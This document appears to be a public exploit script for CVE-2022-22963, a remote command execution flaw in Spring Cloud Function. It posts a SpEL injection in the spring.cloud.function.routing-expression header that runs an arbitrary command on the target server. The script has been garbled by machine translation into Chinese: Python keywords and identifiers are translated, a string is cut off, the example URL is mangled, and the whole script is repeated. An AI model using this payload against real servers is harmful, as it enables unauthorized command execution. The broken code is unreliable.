#利用标题:春季云3.2.2-远程命令执行(RCE)
#date: 07/07/2023
#漏洞作者: gatogamer1155,0bfxgh0st
#供应商HomePage3360 https://spring.io/projects/spring-cloud-function/
#description:利用命令利用CVE-2022-22963
#软件link: https://spring.io/projects/spring-cloud-function
#CVE: CVE-2022-22963
导入请求,ArgParse,JSON
Parser=argparse.argumentparser()
parser.add_argument(' - url',type=str,help='3http://17.0.0.0.2:8080/fornctrouter',必需=true)
parser.add_argument(' - 命令',type=str,help='ping -c1 172.17.0.1',必需=true)
args=parser.parse_args()
print('\ n \ 033 [0; 37m [\ 033 [0; 33m!\ 033 [0; 37m],在响应中,注射命令的输出可能不会反映在响应中,以验证服务器是否易于易于运行或curl ping或curl to ping或curl can
headers={'spring.cloud.function.routing-expression':'t(java.lang.runtime).getRuntime()。exec('%s')'%args.command}
data={'data':''}
request=requests.post(args.url,data=data,headers=标头)
响应=json.dumps(json.loads(request.text),缩进=2)
打印(响应)
#date: 07/07/2023
#漏洞作者: gatogamer1155,0bfxgh0st
#供应商HomePage3360 https://spring.io/projects/spring-cloud-function/
#description:利用命令利用CVE-2022-22963
#软件link: https://spring.io/projects/spring-cloud-function
#CVE: CVE-2022-22963
导入请求,ArgParse,JSON
Parser=argparse.argumentparser()
parser.add_argument(' - url',type=str,help='3http://17.0.0.0.2:8080/fornctrouter',必需=true)
parser.add_argument(' - 命令',type=str,help='ping -c1 172.17.0.1',必需=true)
args=parser.parse_args()
print('\ n \ 033 [0; 37m [\ 033 [0; 33m!\ 033 [0; 37m],在响应中,注射命令的输出可能不会反映在响应中,以验证服务器是否易于易于运行或curl ping或curl to ping或curl can
headers={'spring.cloud.function.routing-expression':'t(java.lang.runtime).getRuntime()。exec('%s')'%args.command}
data={'data':''}
request=requests.post(args.url,data=data,headers=标头)
响应=json.dumps(json.loads(request.text),缩进=2)
打印(响应)
